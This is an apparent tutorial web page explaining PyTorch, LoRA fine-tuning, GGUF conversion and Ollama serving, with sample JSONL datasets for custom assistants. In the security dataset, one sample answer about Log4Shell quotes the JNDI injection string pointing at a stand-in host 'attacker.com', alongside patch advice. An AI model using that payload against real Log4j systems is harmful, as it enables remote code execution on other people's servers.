A step-by-step tour of PyTorch, neural networks, training, the secret format Ollama uses, and how your typed question actually turns into an answer. No PhD required — middle-school math is enough.
Imagine a really, really fast calculator. Not just one that adds two numbers — one that can multiply millions of numbers at once, AND remember every step it took. That's PyTorch. It's a free software library that runs on your computer and powers most of the AI you hear about.
PyTorch has two superpowers:
You don't have to write PyTorch code to use this project. The trainer container does all of that. But knowing what's happening inside helps everything else make sense.
A neural network is built from tiny math units called neurons. A single neuron does something a 5th grader could do:
That's it. One neuron is dumb. But when you stack thousands of them in layers, and the output of one layer becomes the input of the next, magical things happen — the network learns to recognize cats in photos, translate French, or answer grocery questions.
Every "weight" is a number PyTorch stores in a tensor. The famous "135 million parameter model" we use? That's 135 million weights, sitting in tensors, ready to be tuned.
Three things to know. That's it.
Every layer of a model is mostly just multiplication-and-adding. Lots of it.
inputs: [1, 2, 3]
weights: [4, 5, 6]
output = 1×4 + 2×5 + 3×6
= 4 + 10 + 18
= 32
This is called a "dot product." A neural network does millions of these per second.
After the sum, the result goes through an "activation function" that decides if the neuron speaks up.
A common choice is called ReLU. If x is negative, output 0. If positive, pass it through. Simple, but it's the workhorse of modern AI.
Training is just: which way should I tweak the knobs to make the answer better?
PyTorch's autograd computes the slope automatically. The optimizer takes one small step downhill. Repeat thousands of times → the model learns.
Models can't read English. They can only do math. So before any text reaches the model, a piece of code called the tokenizer chops it into pieces and replaces each piece with a number.
The pieces aren't always whole words. Common words get one number; rare words get split. "unbelievable" might split into "un" + "believ" + "able" — three tokens. Each token has an ID from a fixed "vocabulary" (usually around 32,000 – 200,000 entries).
This is also why we say things like "this model has a 2,048 token context" — that's how many tokens it can pay attention to at once.
Four steps, repeated thousands of times. That's all training is.
Show the model one training example and let it guess. For us: "How do I pick a ripe avocado?" The model produces some sequence of tokens.
Compare its guess to the correct answer in our dataset. The loss is a single number — bigger if the guess was bad, smaller if it was close.
PyTorch's autograd walks backwards through every step, computing how much each weight contributed to the error. This is the "gradient."
The optimizer (we use AdamW, a variant of Adam) nudges each weight a tiny bit in the direction that reduces the loss. Just a little: too big a nudge and we overshoot.
Here's a problem: our model has 135 million weights. Training all of them takes a lot of memory and time. And we only have 65 examples — not nearly enough to retrain the whole thing without breaking what it already knows.
LoRA (Low-Rank Adaptation) is the trick. Instead of changing the millions of original weights, we:
It's like teaching a Michelin-starred chef one new dish — you don't send them back to culinary school. You just show them the recipe.
After training, PyTorch saves the model as a bunch of files: weights in .safetensors, settings in config.json, the tokenizer in another folder. That's fine for Python, but Ollama wants something simpler — one file with everything in it.
That format is called GGUF (it stands for "GGML Universal Format" — a bit of an acronym sandwich). Think of it like zipping a complicated folder of files into a single ZIP. Plus, GGUF stores the numbers in a clever way that makes the model fast to load and small to store, especially on regular computers without expensive GPUs.
We use a tool called llama.cpp (a famous open-source project) to do the conversion. One Python command, one file out.
output/merged/
├── config.json
├── model.safetensors (260 MB)
├── tokenizer.json
├── tokenizer_config.json
└── special_tokens_map.json
5 files · ~270 MB total
output/
└── grocery-slm.gguf (270 MB)
1 file · everything inside
Tokenizer, weights, settings — all baked in.
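To make the "one file" idea a little more concrete, here is a minimal sketch of reading the first few header fields of a GGUF file. It assumes the header layout described in the published GGUF specification (the 4-byte magic `GGUF`, then a little-endian uint32 version, a uint64 tensor count, and a uint64 metadata key/value count). The helper name `read_gguf_header` is hypothetical, and the bytes below are synthetic rather than taken from a real model.

```python
import struct

def read_gguf_header(data: bytes) -> dict:
    """Parse the fixed-size start of a GGUF file (assumed v2/v3 layout)."""
    if data[:4] != b"GGUF":
        raise ValueError("not a GGUF file: bad magic bytes")
    # "<IQQ" = little-endian uint32, uint64, uint64
    version, tensor_count, kv_count = struct.unpack_from("<IQQ", data, 4)
    return {"version": version, "tensors": tensor_count, "metadata_keys": kv_count}

# Synthetic header, for illustration only (the counts are made up)
fake_header = b"GGUF" + struct.pack("<IQQ", 3, 272, 30)
header = read_gguf_header(fake_header)
print(header)
```

On a real file you would pass in the first 20 bytes, for example `open(path, "rb").read(20)`.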
A GGUF holds the weights, tokenizer, and settings, but Ollama still needs to be told how to format chats and which defaults to use. For that, we add a Modelfile. It's a tiny text file with simple instructions.
# Where to find the weights
FROM ./grocery-slm.gguf
# How to format messages before the model sees them
TEMPLATE """{{ if .System }}<|im_start|>system
{{ .System }}<|im_end|>
{{ end }}<|im_start|>user
{{ .Prompt }}<|im_end|>
<|im_start|>assistant
"""
# Generation knobs
PARAMETER temperature 0.6
PARAMETER top_p 0.9
# The personality (system prompt)
SYSTEM """You are GroceryGPT..."""
FROM: Points to the GGUF file with the weights. The starting line.
TEMPLATE: The exact text format the model expects. Different model families use different special tokens.
PARAMETER: Generation knobs such as temperature (creativity), top_p (variety), and num_ctx (context window).
SYSTEM: A hidden message sent before every conversation. Sets the personality.
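To see what the TEMPLATE actually produces, here is a rough Python imitation of it. This is only a sketch: Ollama renders the real template with Go's template engine, and the function name `render_chatml` is made up for illustration.

```python
def render_chatml(prompt: str, system: str = "") -> str:
    """Mimic the Modelfile TEMPLATE above using plain string formatting."""
    parts = []
    if system:  # mirrors {{ if .System }} ... {{ end }}
        parts.append(f"<|im_start|>system\n{system}<|im_end|>\n")
    parts.append(f"<|im_start|>user\n{prompt}<|im_end|>\n")
    # The text ends with an open assistant turn, so the model writes the reply
    parts.append("<|im_start|>assistant\n")
    return "".join(parts)

text = render_chatml("How do I pick a ripe avocado?", system="You are GroceryGPT...")
print(text)
```

The model never sees "a question"; it sees this one long string and keeps writing from where it stops.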
The key word here is streaming. The model writes its answer one token at a time. We don't wait for the whole thing — each token gets sent back to your screen immediately. That's why answers feel like they're being typed.
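Here is a small sketch of how a client might stitch a streamed answer back together. It assumes the stream arrives as one JSON object per line, each with a `message.content` fragment and a `done` flag, which is how Ollama's /api/chat streaming is documented. The helper name `iter_stream_text` and the sample lines are invented for illustration; nothing here talks to a real server.

```python
import json

def iter_stream_text(lines):
    """Yield the text fragment from each streamed JSON line until done."""
    for line in lines:
        if not line.strip():
            continue  # skip keep-alive blank lines
        chunk = json.loads(line)
        piece = chunk.get("message", {}).get("content", "")
        if piece:
            yield piece
        if chunk.get("done"):
            break

# Hand-written sample lines, not captured from a real server
sample = [
    '{"message": {"role": "assistant", "content": "Pick"}, "done": false}',
    '{"message": {"role": "assistant", "content": " one"}, "done": false}',
    '{"message": {"role": "assistant", "content": " that yields slightly."}, "done": false}',
    '{"message": {"role": "assistant", "content": ""}, "done": true}',
]
answer = "".join(iter_stream_text(sample))
print(answer)
```

A chat page would append each fragment to the screen as it arrives instead of joining them at the end.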
Softmax, in three minutes.
After all the math, the model spits out a list of raw scores — one for every possible next token (around 49,000 of them). These are called logits. They're not probabilities yet — just preferences.
To turn them into probabilities, we use a function called softmax. It does two things:
Then we don't always pick the highest one. That would be boring and repetitive. Instead we sample: roll dice weighted by the probabilities. The "temperature" parameter controls how spiky vs flat those probabilities are. Low temperature = almost always pick the favorite. High temperature = more variety, more risk of nonsense.
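The "weighted dice" idea can be sketched with Python's standard library. The candidate tokens and their probabilities below are made up, and the helper name `sample_token` is hypothetical; a real model does the same thing over its whole vocabulary.

```python
import random

def sample_token(tokens, probs, rng):
    """Pick one token at random, weighted by its probability."""
    return rng.choices(tokens, weights=probs, k=1)[0]

tokens = ["herbs", "food", "meat", "bikes"]   # hypothetical candidates
probs = [0.65, 0.32, 0.03, 0.00]              # made-up probabilities
rng = random.Random(0)                        # fixed seed so runs repeat
picks = [sample_token(tokens, probs, rng) for _ in range(1000)]
counts = {t: picks.count(t) for t in tokens}
print(counts)
```

Over many rolls the favorite wins most often, but the runner-up still shows up regularly, which is where the variety comes from.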
The whole system is dataset-shaped. Swap out data/dataset.jsonl, retrain, and you've got a completely different specialist. Here are three real templates to start from.
One example per line. Each line is a JSON object with a messages array. Two roles: user (the question) and assistant (the perfect answer you wish the model would give).
{"messages": [
{"role": "user", "content": "..."},
{"role": "assistant", "content": "..."}
]}
Aim for 50+ diverse examples to start. More is better, but quality > quantity. Real, varied, accurate examples beat 1,000 copy-pasted near-duplicates every time.
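Before training, it can help to check the file yourself. The sketch below assumes each example has exactly one user message followed by one assistant message, as in the format shown above; the project's real loader may accept more than that. The function name `validate_jsonl` is made up for illustration.

```python
import json

def validate_jsonl(lines):
    """Return a list of (line_number, problem) for lines that look wrong."""
    problems = []
    for number, line in enumerate(lines, start=1):
        if not line.strip():
            continue  # ignore blank lines
        try:
            record = json.loads(line)
        except json.JSONDecodeError as err:
            problems.append((number, f"invalid JSON: {err.msg}"))
            continue
        messages = record.get("messages") if isinstance(record, dict) else None
        if not isinstance(messages, list) or not messages:
            problems.append((number, "missing or empty 'messages' array"))
            continue
        roles = [m.get("role") for m in messages if isinstance(m, dict)]
        if roles != ["user", "assistant"]:
            problems.append((number, f"expected user then assistant, got {roles}"))
    return problems

sample = [
    '{"messages": [{"role": "user", "content": "Hi"}, {"role": "assistant", "content": "Hello!"}]}',
    '{"messages": [{"role": "user", "content": "Broken line"}',
    '{"messages": [{"role": "assistant", "content": "No question"}]}',
]
problems = validate_jsonl(sample)
for number, problem in problems:
    print(f"line {number}: {problem}")
```

To check a real file, pass it an open file handle, for example `validate_jsonl(open("data/dataset.jsonl", encoding="utf-8"))`.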
For making a coding assistant. Each example is a programming question and a clean, runnable solution.
{"messages":[{"role":"user","content":"How do I read a file line by line in Python?"},{"role":"assistant","content":"Use a context manager, which closes the file automatically:\n\n```python\nwith open('file.txt') as f:\n    for line in f:\n        print(line.rstrip())\n```\n\nThis streams one line at a time, so it works on huge files."}]}
{"messages":[{"role":"user","content":"Reverse a string in JavaScript."},{"role":"assistant","content":"```javascript\nconst reversed = str.split('').reverse().join('');\n```\n\nSplit into characters, reverse the array, join back. Note: this breaks on emoji and some Unicode — use Array.from(str) for those."}]}
{"messages":[{"role":"user","content":"What's the difference between let and const in JS?"},{"role":"assistant","content":"`const` means you can't reassign the variable. `let` means you can. Both are block-scoped (unlike var). Default to const; use let only when you genuinely need to reassign."}]}
Your own commits, Stack Overflow Q&A, public docs of libraries you love. Pair each question with a tested answer.
Escape newlines properly (\n). A line with invalid JSON gets silently skipped, so that example never reaches training. Use the same code-fence style (```python) everywhere.
Include a couple "explain this" examples too — not just code generation. Helps the model talk about code, not just write it.
For a security/networking helper. Ports, protocols, CVEs, common attacks, headers — concise, accurate, citable.
{"messages":[{"role":"user","content":"What's the default port for SSH?"},{"role":"assistant","content":"SSH uses TCP port 22 by default, assigned by IANA. Many admins move it to a non-standard port to reduce noisy scans — that's security through obscurity, not real protection. Real protection comes from key-based auth and disabling password login."}]}
{"messages":[{"role":"user","content":"What is CVE-2021-44228?"},{"role":"assistant","content":"Log4Shell, a critical remote code execution flaw in Apache Log4j 2 (versions 2.0-beta9 through 2.14.1). Attackers can trigger it by getting a vulnerable app to log a crafted string like ${jndi:ldap://attacker.com/x}. CVSS score: 10.0. Fix: upgrade Log4j to a patched release (2.17.1 or later also covers the follow-up CVEs). Setting log4j2.formatMsgNoLookups=true was an early stopgap for 2.10+ and is not a complete fix."}]}
{"messages":[{"role":"user","content":"Explain the X-Frame-Options HTTP header."},{"role":"assistant","content":"X-Frame-Options tells browsers whether your page can be embedded in an <iframe> on other sites. Values: DENY (never), SAMEORIGIN (only your own site), or ALLOW-FROM uri (deprecated). It prevents clickjacking. Modern alternative: Content-Security-Policy frame-ancestors directive, which is more flexible."}]}
{"messages":[{"role":"user","content":"What does a SYN flood attack do?"},{"role":"assistant","content":"It exploits the TCP 3-way handshake. The attacker sends many SYN packets but never replies to the SYN-ACK. The target's connection table fills with half-open connections, eventually refusing legitimate traffic. Mitigations: SYN cookies (defer state allocation until ACK arrives), connection rate limits, and proper firewall rules."}]}
NIST NVD (CVE database), MITRE ATT&CK, RFC documents, OWASP cheat sheets. All free and authoritative.
Accuracy matters more here than anywhere — wrong CVE details could mislead someone in a real incident. Verify every answer.
Add a system-prompt rule: "If you're not sure, say so." Small models will confidently invent CVEs otherwise.
For a log-whisperer. Paste an obscure log line, get a plain-English explanation and likely causes.
{"messages":[{"role":"user","content":"What does this mean?\n2024-03-15 14:22:01 ERROR [pool-1-thread-3] com.app.UserService - Failed to authenticate user: java.sql.SQLException: Connection timeout after 30000ms"},{"role":"assistant","content":"A Java app (UserService) tried to look up a user in a database to authenticate them, but the database query timed out after 30 seconds. Most likely causes:\n\n1. The database is down or unreachable.\n2. Connection pool exhausted — all connections in use.\n3. A slow query is holding locks.\n4. Network issue between app and DB.\n\nCheck DB status first, then connection pool metrics, then query logs."}]}
{"messages":[{"role":"user","content":"Nginx log: 192.168.1.5 - - [12/Mar/2024:10:14:33 +0000] \"GET /api/users HTTP/1.1\" 404 312 \"-\" \"curl/7.81.0\""},{"role":"assistant","content":"An Nginx access log entry. Breaking it down:\n• 192.168.1.5 — client IP\n• 12/Mar/2024:10:14:33 — timestamp\n• GET /api/users — request method + path\n• 404 — status code: resource not found\n• 312 — bytes sent in response body\n• curl/7.81.0 — User-Agent (someone using curl, not a browser)\n\nThe 404 means /api/users doesn't exist on this server. Check your route config or if the request should go to a different upstream."}]}
{"messages":[{"role":"user","content":"systemd: 'sshd.service: Main process exited, code=killed, status=9/KILL'"},{"role":"assistant","content":"The SSH daemon (sshd) was killed by signal 9 (SIGKILL). Signal 9 cannot be caught or ignored, so something forcibly terminated the process. Common causes:\n\n1. The system ran out of memory and the kernel's OOM killer picked sshd.\n2. Someone ran `kill -9` manually.\n3. A misbehaving init script.\n\nCheck `dmesg | grep -i oom` for memory pressure, and `journalctl _COMM=systemd` around the timestamp for context."}]}
Your own logs (redact PII!) — nginx, syslog, application logs. Public dataset: LogHub has labeled samples.
Strip secrets, IPs, usernames, real CVE IDs from your own logs before training. Models can leak training data verbatim.
Cover multiple log formats — nginx, systemd, JSON-structured logs, stack traces. Each looks different.
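As a starting point for the redaction tip above, here is a minimal sketch that masks IPv4 addresses and email addresses with regular expressions. The patterns and the `redact` helper are illustrative assumptions: they will not catch IPv6 addresses, API keys, or usernames, so treat this as a first pass and still review the data by hand.

```python
import re

IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
EMAIL = re.compile(r"\b[\w.+-]+@[\w-]+(?:\.[\w-]+)+\b")

def redact(line: str) -> str:
    """Replace IPv4 addresses and email addresses with placeholders."""
    line = IPV4.sub("<IP>", line)
    return EMAIL.sub("<EMAIL>", line)

raw = '192.168.1.5 - - [12/Mar/2024:10:14:33 +0000] "GET /api/users HTTP/1.1" 404 312 "-" "curl/7.81.0"'
clean = redact(raw)
print(clean)
```

Note that the version string `curl/7.81.0` is left alone because it has only three number groups, not four.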
Replace data/dataset.jsonl (overwrite the grocery one).
Update the SYSTEM line in Modelfile to match the new persona.
Run docker compose --profile train run --rm trainer (takes 5–15 min on CPU).
Run docker compose restart ollama-init and try your new model.
The math engine. Defines the tensors, runs the forward + backward pass, and lets PEFT bolt LoRA onto the model.
A library that wraps PyTorch with model-specific knowledge. Knows the architecture of SmolLM2 (and dozens of others), how to tokenize for it, and how to load weights from the Hugging Face Hub.
"Parameter Efficient Fine-Tuning." Implements LoRA. About 50 lines of config and PyTorch knows to freeze the base and add tiny trainable adapters.
The legendary open-source project that started CPU inference of LLMs. We use its Python converter to turn PyTorch weights into a single GGUF file.
The "Docker for LLMs." Loads GGUF files, manages models, and serves a simple HTTP API for chat. Auto-detects whether to use GPU or CPU.
Packages every service (trainer, ollama, init, web UI) into containers so it runs the same on any computer. docker compose up brings the whole stack online.
A web server. We use it for two things: serving the HTML chat page and proxying API requests to Ollama (avoids CORS pain).
The best free resources to go further. All of these are written by the people who built the things.
Start with "Learn the Basics" — a 60-minute walkthrough.
The most beautiful visual explanations of backpropagation and how networks work. Truly accessible.
2-hour video where Andrej Karpathy codes a tiny language model live. Worth every minute.
The library we use for loading and training. The "Pipelines" section is the easiest entry point.
How to fine-tune with adapters. Includes recipes for many model families.
If you want to see the math. Surprisingly readable; the key idea fits on one page.
The 2017 paper that introduced the Transformer architecture — the foundation of GPT, Claude, every modern LLM.
Hundreds of pre-made models you can `ollama pull` instantly. Great for experimenting.
/api/chat, /api/generate, streaming, tools — everything our web UI talks to.
Karpathy's minimal GPT in ~300 lines of PyTorch. The whole transformer in one readable file.
The base model we fine-tune. See its card for benchmarks and training details.
The exact byte layout of a GGUF file. Useful if you ever need to debug or build tooling.
Here's the famous autograd demo. PyTorch tracks every operation you do on a tensor with requires_grad=True and lets you compute derivatives automatically.
import torch
# A number we want to find the slope at
x = torch.tensor([3.0], requires_grad=True)
# A function: y = x²
y = x ** 2
# Compute the slope of y with respect to x
y.backward()
# dy/dx at x=3 → 2x = 6
print(x.grad) # tensor([6.])
Now imagine instead of one number, x is 135 million weights, and instead of x² it's a whole neural network with 32 layers. Same idea — PyTorch handles all the bookkeeping.
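If you want to double-check that slope without PyTorch, a finite-difference estimate works for simple functions. This is only a numerical sanity check, not how autograd works internally (autograd applies exact derivative rules to each recorded operation). The helper name `numeric_slope` is made up.

```python
def f(x):
    return x ** 2

def numeric_slope(func, x, h=1e-5):
    """Central-difference estimate of the derivative of func at x."""
    return (func(x + h) - func(x - h)) / (2 * h)

slope = numeric_slope(f, 3.0)
print(round(slope, 4))  # should land very close to 6, matching x.grad above
```

Doing this for 135 million weights would need hundreds of millions of extra forward passes, which is why automatic differentiation matters.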
Say a neuron has these settings:
Weights: w₁ = 0.5, w₂ = -0.3, w₃ = 0.8
Bias: b = 0.1
Activation: ReLU (max(0, x))
And these inputs: x₁ = 2, x₂ = 4, x₃ = 1
sum = 0.5×2 + (-0.3)×4 + 0.8×1 + 0.1
= 1.0 + -1.2 + 0.8 + 0.1
= 0.7
output = ReLU(0.7) = max(0, 0.7) = 0.7
That's the entire computation in one neuron. A real model just does this for millions of neurons, organized in layers where each layer's outputs feed the next.
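The same neuron, written as a few lines of plain Python. This is a sketch for checking the arithmetic by hand; the function names are made up, and real frameworks compute many neurons at once rather than one at a time.

```python
def relu(x):
    return max(0.0, x)

def neuron(inputs, weights, bias):
    """Weighted sum of the inputs plus a bias, passed through ReLU."""
    total = sum(w * x for w, x in zip(weights, inputs)) + bias
    return relu(total)

output = neuron(inputs=[2, 4, 1], weights=[0.5, -0.3, 0.8], bias=0.1)
print(round(output, 4))
```

Try flipping the bias to -1.0: the sum goes negative and ReLU silences the neuron by returning 0.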
When a whole layer of neurons processes inputs at once, we do it with matrix multiplication. Say 3 inputs going into 2 neurons:
inputs = [1, 2, 3] (1 × 3 matrix)
weights = [[0.5, -0.1, 0.2],
[0.3, 0.4, 0.7]] (2 × 3 matrix)
each output = dot product of inputs with one weight row:
neuron 1: 1×0.5 + 2×(-0.1) + 3×0.2 = 0.9
neuron 2: 1×0.3 + 2×0.4 + 3×0.7 = 3.2
Big neural networks are stacks of these matrix multiplications, with activation functions in between. GPUs are amazing at matrix multiplication; that's why they took over AI.
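The layer above can be sketched in plain Python as one dot product per weight row. The function name `layer` is made up; in PyTorch the whole thing would be a single matrix multiplication.

```python
def layer(inputs, weight_rows):
    """One output per weight row: the dot product of that row with the inputs."""
    return [sum(w * x for w, x in zip(row, inputs)) for row in weight_rows]

inputs = [1, 2, 3]
weights = [[0.5, -0.1, 0.2],
           [0.3, 0.4, 0.7]]
outputs = layer(inputs, weights)
print([round(v, 4) for v in outputs])
```

Each row of weights is one neuron, so adding a neuron to the layer just means adding a row.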
Imagine you're standing on a hill in fog. You can't see the bottom, but you can feel which way is downhill. So you take a small step downhill. Repeat. Eventually you reach a valley.
That's it. The "hill" is the loss function. The "downhill direction" is the negative of the gradient. The "step size" is the learning rate. Doing this for every weight in the model — at once, automatically — is what training is.
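Here is the foggy-hill walk for a single weight, as a minimal sketch. The loss function is a made-up bowl shape with its lowest point at w = 3, and the gradient is written out by hand instead of using autograd.

```python
def loss(w):
    return (w - 3.0) ** 2      # lowest point of the "hill" is at w = 3

def gradient(w):
    return 2.0 * (w - 3.0)     # slope of the loss at w

w = 0.0                        # starting position
learning_rate = 0.1            # step size
for step in range(50):
    w -= learning_rate * gradient(w)   # step against the gradient, i.e. downhill

print(round(w, 4), round(loss(w), 8))
```

With a learning rate above 1.0 each step overshoots by more than it corrects, and w runs away from 3 instead of settling on it.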
The tokenizer is built by a process called BPE (byte-pair encoding). It scans a huge pile of text, finds the most common pair of adjacent characters, merges that pair into a single token, and repeats. Over thousands of merge steps you end up with a vocabulary that has common pieces as whole tokens, and rare words as smaller chunks.
Examples for SmolLM2's tokenizer (illustrative):
"the" → 1 token
"avocado" → 1 token
"GroceryGPT" → 4 tokens ("G", "rocery", "GP", "T")
"floccinaucinihilipilification" → 11 tokens
Numbers get tokenized too — usually each digit is its own token. That's why language models are sometimes bad at math involving long numbers.
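The merge loop can be sketched on a toy corpus. This is a simplified illustration of the BPE idea, not SmolLM2's actual tokenizer training; the corpus, word counts, and function names are all made up.

```python
from collections import Counter

def most_common_pair(words):
    """Count adjacent symbol pairs across all words; return the most frequent."""
    pairs = Counter()
    for symbols, count in words.items():
        for left, right in zip(symbols, symbols[1:]):
            pairs[(left, right)] += count
    return pairs.most_common(1)[0][0]

def merge_pair(words, pair):
    """Rewrite every word with the chosen pair fused into one symbol."""
    merged = {}
    for symbols, count in words.items():
        out, i = [], 0
        while i < len(symbols):
            if i + 1 < len(symbols) and (symbols[i], symbols[i + 1]) == pair:
                out.append(symbols[i] + symbols[i + 1])
                i += 2
            else:
                out.append(symbols[i])
                i += 1
        merged[tuple(out)] = merged.get(tuple(out), 0) + count
    return merged

# Tiny made-up corpus: word (as characters) -> how often it appears
words = {tuple("low"): 5, tuple("lower"): 2, tuple("lowest"): 3}
merges = []
for _ in range(2):
    pair = most_common_pair(words)
    merges.append(pair)
    words = merge_pair(words, pair)
print(merges)
print(list(words))
```

After two merges the common word "low" has become a single token, while "lower" and "lowest" are still "low" plus leftover letters.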
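Stripped down to the essential lines, this is roughly what Hugging Face's Trainer does for us (model, dataloader, and num_epochs are assumed to be set up already):
import torch
optimizer = torch.optim.AdamW(model.parameters(), lr=2e-4)
for epoch in range(num_epochs):
    for batch in dataloader:
        # 1. forward: run the batch through the model and read off the loss
        outputs = model(**batch)
        loss = outputs.loss
        # 2. backward: compute a gradient for every trainable weight
        loss.backward()
        # 3. update: nudge the weights, then clear gradients for the next batch
        optimizer.step()
        optimizer.zero_grad()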
Five lines do the work. The rest of Hugging Face is configuration around this core — batching, logging, checkpointing, distributed training.
A weight matrix in the model is called W — let's say it's 768 × 768 (about 590,000 numbers). LoRA replaces "tweak W directly" with this:
W_new = W_frozen + B × A
where:
A is shape (8 × 768) — 6,144 numbers
B is shape (768 × 8) — 6,144 numbers
The 8 is the "rank", the main knob LoRA gives you (the scaling factor and the choice of which layers get adapters matter too). We use 8.
During training we only update A and B: 12,288 numbers instead of 590,000, roughly a 48× saving per layer. At the end we precompute B × A once and add it into W_frozen. The result is a normal model file with no LoRA machinery at runtime.
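The counting and the final merge step can be checked with a short sketch. It uses plain Python lists instead of tensors, and the tiny 2 × 2 matrices are made-up numbers chosen so the result is easy to verify by hand; the function names are hypothetical.

```python
def matmul(a, b):
    """Multiply two matrices given as lists of rows."""
    return [[sum(a[i][k] * b[k][j] for k in range(len(b)))
             for j in range(len(b[0]))] for i in range(len(a))]

def merge_lora(w_frozen, b, a):
    """Return W_frozen + B x A, the merged weight matrix."""
    delta = matmul(b, a)
    return [[w + d for w, d in zip(w_row, d_row)]
            for w_row, d_row in zip(w_frozen, delta)]

# Parameter counts for the 768 x 768 example with rank 8
d, rank = 768, 8
full_params = d * d                # numbers in W
lora_params = rank * d + d * rank  # numbers in A plus numbers in B
print(full_params, lora_params, full_params / lora_params)

# Tiny 2 x 2 demo with rank 1 (made-up numbers)
w_frozen = [[1.0, 0.0], [0.0, 1.0]]
b = [[0.5], [1.0]]        # shape 2 x 1
a = [[2.0, 4.0]]          # shape 1 x 2
w_new = merge_lora(w_frozen, b, a)
print(w_new)
```

The merged matrix has the same shape as the original, which is why the exported model needs no LoRA code to run.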
PyTorch weights are usually stored as 32-bit floating point numbers — 4 bytes each. For 135M parameters that's 540 MB.
GGUF can store the same weights at lower precision. Each weight takes fewer bits, but the model behaves almost the same. Common levels:
Format    Bits per weight   Quality                  Size vs F32
F32       32                full precision           100%
F16       16                half precision           50%
Q8_0      8                 tiny accuracy loss       25%
Q4_K_M    ~4.5              some quality loss        ~14%
Q2_K      2                 noticeable degradation   6%
In this project we ship F16 because 135M is already tiny: the whole file is about 270 MB, so quantizing further saves relatively little and isn't worth the quality drop. For big models (7B+) you'll see Q4_K_M everywhere because it's a great trade-off.
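The size arithmetic, plus a toy version of 8-bit quantization, can be sketched as follows. The round trip uses one shared scale for all values, which is a simplification: real GGUF formats quantize weights in small blocks with their own scales and extra bookkeeping. The weights and function names are made up.

```python
def size_mb(num_params, bits_per_weight):
    """Approximate file size in megabytes (1 MB = 1,000,000 bytes)."""
    return num_params * bits_per_weight / 8 / 1_000_000

params = 135_000_000
for name, bits in [("F32", 32), ("F16", 16), ("Q8_0", 8), ("Q4_K_M", 4.5)]:
    print(f"{name:7s} {size_mb(params, bits):7.1f} MB")

def quantize_8bit(values):
    """Map floats to integers in [-127, 127] using one shared scale."""
    scale = max(abs(v) for v in values) / 127 or 1.0
    return [round(v / scale) for v in values], scale

def dequantize(ints, scale):
    return [i * scale for i in ints]

weights = [0.12, -0.5, 0.33, 0.02]          # made-up weights
ints, scale = quantize_8bit(weights)
restored = dequantize(ints, scale)
print(ints, [round(v, 3) for v in restored])
```

The restored values are close to the originals but not identical; that small rounding error is the "accuracy loss" in the table.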
Softmax turns raw scores ("logits") into probabilities. The formula:
softmax(x_i) = exp(x_i) / Σ exp(x_j)
Worked example. Say the candidate next tokens are herbs, food, meat, and bikes, with logits [8.2, 7.5, 5.1, 1.0]:
exp(8.2) = 3640
exp(7.5) = 1808
exp(5.1) = 164
exp(1.0) = 2.7
sum = 3640 + 1808 + 164 + 2.7 = 5615
prob(herbs) = 3640 / 5615 = 0.648
prob(food) = 1808 / 5615 = 0.322
prob(meat) = 164 / 5615 = 0.029
prob(bikes) = 2.7 / 5615 = 0.0005
Temperature changes this. The model divides logits by T before softmax. T=2 makes everything flatter (more random). T=0.3 makes the highest probability dominate (more deterministic). We use T=0.6 — a nice middle ground.
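To see temperature in action, here is a short softmax sketch using only the standard library. It subtracts the largest logit before exponentiating, a common trick to avoid overflow that does not change the result. The function signature is an illustrative choice, not taken from any particular library.

```python
import math

def softmax(logits, temperature=1.0):
    """Convert logits to probabilities, dividing by temperature first."""
    scaled = [x / temperature for x in logits]
    peak = max(scaled)                      # subtract the max for numerical stability
    exps = [math.exp(x - peak) for x in scaled]
    total = sum(exps)
    return [e / total for e in exps]

logits = [8.2, 7.5, 5.1, 1.0]
for t in (0.3, 0.6, 1.0, 2.0):
    probs = softmax(logits, temperature=t)
    print(t, [round(p, 3) for p in probs])
```

Running it shows the top probability growing as T drops below 1 and shrinking as T rises above it, while each row still sums to 1.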